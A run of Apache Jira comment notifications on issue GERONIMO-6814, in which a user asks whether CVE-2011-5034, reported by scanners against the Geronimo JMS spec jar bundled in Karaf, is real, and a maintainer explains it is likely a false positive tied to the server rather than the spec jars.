[jira] [Commented] (GERONIMO-6814) Improve Geronimo specs to mitigate CVE-2011-5034
[ https://issues.apache.org/jira/browse/GERONIMO-6814?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17388667#comment-17388667 ] Romain Manni-Bucau commented on GERONIMO-6814: -- Implementations can have cve - but here you will need to show how since last releases dont have the linked cve. Specs jars have almost no impl generally. > Improve Geronimo specs to mitigate CVE-2011-5034 > > > Key: GERONIMO-6814 > URL: https://issues.apache.org/jira/browse/GERONIMO-6814 > Project: Geronimo > Issue Type: Bug > Security Level: public(Regular issues) > Components: geronimo-maven-plugin >Affects Versions: 1.1.1 >Reporter: Karthick >Priority: Major > > Hi, > > By default Apache Karaf 4.3.2 ([Maven Repository: org.apache.karaf » > apache-karaf » 4.3.2 > (mvnrepository.com)|https://mvnrepository.com/artifact/org.apache.karaf/apache-karaf/4.3.2] > packs jms_geronimo_1.1_spec 1.1.1 version which when scanned through > security tools like Jfrog XRay and Anchore reports CVE-2011-5034 ([NVD - > CVE-2011-5034 (nist.gov)|https://nvd.nist.gov/vuln/detail/CVE-2011-5034] ) > However, there seems to be no later version of geronimo where this CVE is > fixed.It has been 10 years since this CVE is created and no fix seen yet. Do > you have analysis on whether this CVE really affects geronimo specs or any > plan to provide next version? > There -- This message was sent by Atlassian Jira (v8.3.4#803005)
[jira] [Commented] (GERONIMO-6814) Improve Geronimo specs to mitigate CVE-2011-5034
[ https://issues.apache.org/jira/browse/GERONIMO-6814?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17388651#comment-17388651 ] Karthick commented on GERONIMO-6814: I can see that these geronimo jms and jta specs expose javax transaction and javax jms APIs. So, do you mean that this CVEs on hash collision doesn't affect these Java APIs? > Improve Geronimo specs to mitigate CVE-2011-5034 > > > Key: GERONIMO-6814 > URL: https://issues.apache.org/jira/browse/GERONIMO-6814 > Project: Geronimo > Issue Type: Bug > Security Level: public(Regular issues) > Components: geronimo-maven-plugin >Affects Versions: 1.1.1 >Reporter: Karthick >Priority: Major > > Hi, > > By default Apache Karaf 4.3.2 ([Maven Repository: org.apache.karaf » > apache-karaf » 4.3.2 > (mvnrepository.com)|https://mvnrepository.com/artifact/org.apache.karaf/apache-karaf/4.3.2] > packs jms_geronimo_1.1_spec 1.1.1 version which when scanned through > security tools like Jfrog XRay and Anchore reports CVE-2011-5034 ([NVD - > CVE-2011-5034 (nist.gov)|https://nvd.nist.gov/vuln/detail/CVE-2011-5034] ) > However, there seems to be no later version of geronimo where this CVE is > fixed.It has been 10 years since this CVE is created and no fix seen yet. Do > you have analysis on whether this CVE really affects geronimo specs or any > plan to provide next version? > There -- This message was sent by Atlassian Jira (v8.3.4#803005)
[jira] [Commented] (GERONIMO-6814) Improve Geronimo specs to mitigate CVE-2011-5034
[ https://issues.apache.org/jira/browse/GERONIMO-6814?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17387945#comment-17387945 ] Romain Manni-Bucau commented on GERONIMO-6814: -- Specs are javaee api. But this issue affevcts also microprofile artifacts which are unrelated to these cve. Most cve are on the deprecated server and irrelevant, we ensure there is none on maintained artifacts. > Improve Geronimo specs to mitigate CVE-2011-5034 > > > Key: GERONIMO-6814 > URL: https://issues.apache.org/jira/browse/GERONIMO-6814 > Project: Geronimo > Issue Type: Bug > Security Level: public(Regular issues) > Components: geronimo-maven-plugin >Affects Versions: 1.1.1 >Reporter: Karthick >Priority: Major > > Hi, > > By default Apache Karaf 4.3.2 ([Maven Repository: org.apache.karaf » > apache-karaf » 4.3.2 > (mvnrepository.com)|https://mvnrepository.com/artifact/org.apache.karaf/apache-karaf/4.3.2] > packs jms_geronimo_1.1_spec 1.1.1 version which when scanned through > security tools like Jfrog XRay and Anchore reports CVE-2011-5034 ([NVD - > CVE-2011-5034 (nist.gov)|https://nvd.nist.gov/vuln/detail/CVE-2011-5034] ) > However, there seems to be no later version of geronimo where this CVE is > fixed.It has been 10 years since this CVE is created and no fix seen yet. Do > you have analysis on whether this CVE really affects geronimo specs or any > plan to provide next version? > There -- This message was sent by Atlassian Jira (v8.3.4#803005)
[jira] [Commented] (GERONIMO-6814) Improve Geronimo specs to mitigate CVE-2011-5034
[ https://issues.apache.org/jira/browse/GERONIMO-6814?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17387903#comment-17387903 ] Karthick commented on GERONIMO-6814: Hi, I am unable to find what the 'spec' means. Not in maven [Maven Repository: org.apache.geronimo.specs » geronimo-jms_1.1_spec » 1.1.1 (mvnrepository.com)|https://mvnrepository.com/artifact/org.apache.geronimo.specs/geronimo-jms_1.1_spec/1.1.1] and not in github [apache/geronimo-specs: Mirror of Apache Geronimo specs (github.com)|https://github.com/apache/geronimo-specs]. If you could provide a differentiating factor between what artifacts you mean as runtime/server and what is the definition of 'specs'. > Improve Geronimo specs to mitigate CVE-2011-5034 > > > Key: GERONIMO-6814 > URL: https://issues.apache.org/jira/browse/GERONIMO-6814 > Project: Geronimo > Issue Type: Bug > Security Level: public(Regular issues) > Components: geronimo-maven-plugin >Affects Versions: 1.1.1 >Reporter: Karthick >Priority: Major > > Hi, > > By default Apache Karaf 4.3.2 ([Maven Repository: org.apache.karaf » > apache-karaf » 4.3.2 > (mvnrepository.com)|https://mvnrepository.com/artifact/org.apache.karaf/apache-karaf/4.3.2] > packs jms_geronimo_1.1_spec 1.1.1 version which when scanned through > security tools like Jfrog XRay and Anchore reports CVE-2011-5034 ([NVD - > CVE-2011-5034 (nist.gov)|https://nvd.nist.gov/vuln/detail/CVE-2011-5034] ) > However, there seems to be no later version of geronimo where this CVE is > fixed.It has been 10 years since this CVE is created and no fix seen yet. Do > you have analysis on whether this CVE really affects geronimo specs or any > plan to provide next version? > There -- This message was sent by Atlassian Jira (v8.3.4#803005)
[jira] [Commented] (GERONIMO-6814) Improve Geronimo specs to mitigate CVE-2011-5034
[ https://issues.apache.org/jira/browse/GERONIMO-6814?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17387848#comment-17387848 ] Romain Manni-Bucau commented on GERONIMO-6814: -- Hi, AFAIK these vulnerabilities are related to the server and not spec jar but cve scanner mix it due to the groupid so looks like a false positive to me. > Improve Geronimo specs to mitigate CVE-2011-5034 > > > Key: GERONIMO-6814 > URL: https://issues.apache.org/jira/browse/GERONIMO-6814 > Project: Geronimo > Issue Type: Bug > Security Level: public(Regular issues) > Components: geronimo-maven-plugin >Affects Versions: 1.1.1 >Reporter: Karthick >Priority: Major > > Hi, > > By default Apache Karaf 4.3.2 ([Maven Repository: org.apache.karaf » > apache-karaf » 4.3.2 > (mvnrepository.com)|https://mvnrepository.com/artifact/org.apache.karaf/apache-karaf/4.3.2] > packs jms_geronimo_1.1_spec 1.1.1 version which when scanned through > security tools like Jfrog XRay and Anchore reports CVE-2011-5034 ([NVD - > CVE-2011-5034 (nist.gov)|https://nvd.nist.gov/vuln/detail/CVE-2011-5034] ) > However, there seems to be no later version of geronimo where this CVE is > fixed.It has been 10 years since this CVE is created and no fix seen yet. Do > you have analysis on whether this CVE really affects geronimo specs or any > plan to provide next version? > There -- This message was sent by Atlassian Jira (v8.3.4#803005)